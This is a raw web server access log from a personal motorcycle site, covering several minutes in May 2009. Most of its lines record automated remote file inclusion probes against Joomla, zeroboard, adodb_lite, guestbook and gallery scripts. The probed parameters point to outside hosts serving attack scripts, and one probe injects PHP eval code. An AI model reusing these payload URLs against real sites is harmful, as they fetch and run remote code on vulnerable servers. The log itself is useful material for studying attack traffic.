64.13.231.196 - - [05/May/2009:11:10:06 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.search9.net/config/proxy/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
217.112.35.52 - - [05/May/2009:11:10:13 -0700] "GET /logs//index_for.php?classified_path=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.112.35.52 - - [05/May/2009:11:10:13 -0700] "GET /index_for.php?classified_path=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.93.90.162 - - [05/May/2009:11:10:19 -0700] "GET /logs/access_080331.log//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:11:10:30 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:11:10:30 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [05/May/2009:11:10:48 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [05/May/2009:11:10:48 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [05/May/2009:11:10:48 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:11:00 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:11:42 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:11:45 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:11:45 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:11:45 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:11:45 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:12:00 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.240 - - [05/May/2009:11:12:06 -0700] "GET /logs/access_080311.log/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:12:19 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:12:19 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:12:19 -0700] "GET /logs/access_081103.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:11:12:19 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:11:12:20 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:11:12:20 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.193.186 - - [05/May/2009:11:12:30 -0700] "GET /bikes/dteel/DesertSTOC07/IMG_2391s.JPG HTTP/1.1" 200 739503 "-" "BaiduImagespider+(+http://www.baidu.jp/spider/)" "dmulk.com"
84.54.137.9 - - [05/May/2009:11:12:34 -0700] "GET /logs/access_090107.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:13:09 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:13:10 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:13:11 -0700] "GET /logs/access_080925.log%20%20//include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:13:15 -0700] "GET /logs/access_080331.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:13:26 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:13:34 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:13:42 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:13:42 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:13:42 -0700] "GET /logs/access_090216.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:13:43 -0700] "GET /logs/access_080831.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:13:47 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:11:13:55 -0700] "GET /logs/access_081215.log/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:11:13:55 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:11:13:55 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:13:59 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:14:05 -0700] "GET /logs/access_080829.log//admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:14:05 -0700] "GET /admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:14:06 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:14:06 -0700] "GET /logs/access_090311.log//admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:14:07 -0700] "GET /logs/access_080829.log//admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:14:08 -0700] "GET /admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:14:08 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:11:14:09 -0700] "GET /logs/access_090311.log//admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:11:14:38 -0700] "GET /logs/access_080829.log//admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:11:14:38 -0700] "GET /admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:11:14:38 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:11:14:39 -0700] "GET /logs/access_090311.log//admin.cropcanvas.php?cropimagedir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.103 - - [05/May/2009:11:15:06 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.238.145.120 - - [05/May/2009:11:15:11 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.145.120 - - [05/May/2009:11:15:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:11:16:24 -0700] "GET /logs/access_081220.log/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:16:24 -0700] "GET /logs/access_080831.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:16:24 -0700] "GET /logs/access_090216.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:11:16:49 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:17:43 -0700] "GET /logs/access_080331.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.66.227 - - [05/May/2009:11:18:04 -0700] "GET /index2.php?mosConfig_absolute_path=http://h1.ripway.com/rina212/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:18:33 -0700] "GET /logs/access_080825.log//?dir[func]=&dir[base]=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:18:33 -0700] "GET /logs//?dir[func]=&dir[base]=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 200 98194 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:11:18:36 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:11:18:51 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.146.255.34 - - [05/May/2009:11:19:16 -0700] "GET /?dir[func]=&dir[base]=http://leschivre.free.fr//id2.txt%0D?? HTTP/1.1" 200 42963 "-" "libwww-perl/5.79" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:35 -0700] "GET //advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:35 -0700] "GET //advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:35 -0700] "GET /logs/access_090328.log///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:35 -0700] "GET /logs///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:35 -0700] "GET /logs/access_090328.log///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:35 -0700] "GET /logs///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:41 -0700] "GET //advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:41 -0700] "GET /logs///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:41 -0700] "GET //advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:41 -0700] "GET /logs/access_090316.log%20%20///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:41 -0700] "GET /logs///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:41 -0700] "GET /logs/access_090316.log%20%20///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:42 -0700] "GET //advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:42 -0700] "GET /logs///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:42 -0700] "GET /logs/access_090316.log///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:45 -0700] "GET //advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:45 -0700] "GET /logs/access_090316.log///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:20:45 -0700] "GET /logs///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.184.103 - - [05/May/2009:11:22:04 -0700] "GET /logs/access_080331.log//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:22:09 -0700] "GET /logs/access_090208.log%20%20///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:22:13 -0700] "GET /logs/access_090208.log///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:22:18 -0700] "GET /logs/access_090208.log%20%20///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:22:22 -0700] "GET /logs/access_090208.log///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:22:34 -0700] "GET /logs/access_090316.log///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:22:34 -0700] "GET /logs///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:22:34 -0700] "GET //advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:22:37 -0700] "GET //advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:22:37 -0700] "GET /logs///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:22:37 -0700] "GET /logs/access_090316.log///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:11:22:43 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:11:22:43 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:11:23:07 -0700] "GET /main.php?_zb_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:11:23:07 -0700] "GET /logs/access_071214.log%20%20//main.php?_zb_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:11:23:07 -0700] "GET /logs//main.php?_zb_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:11:23:09 -0700] "GET /logs/access_080331.log//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
173.24.242.151 - - [05/May/2009:11:23:10 -0700] "GET /bikes/dteel/Temp/IMG_3454s.JPG HTTP/1.1" 200 0 "http://www.st-owners.com/forums/showthread.php?t=63518" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "dmulk.com"
220.133.32.123 - - [05/May/2009:11:24:14 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:11:24:15 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:24:22 -0700] "GET /logs/access_090208.log///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [05/May/2009:11:24:24 -0700] "GET /logs/access_090208.log///advguestbook/errors.php?error=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:11:24:33 -0700] "GET /logs/access_080331.log%20%20//main.php?_zb_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs/access_080406.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs/access_080224.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
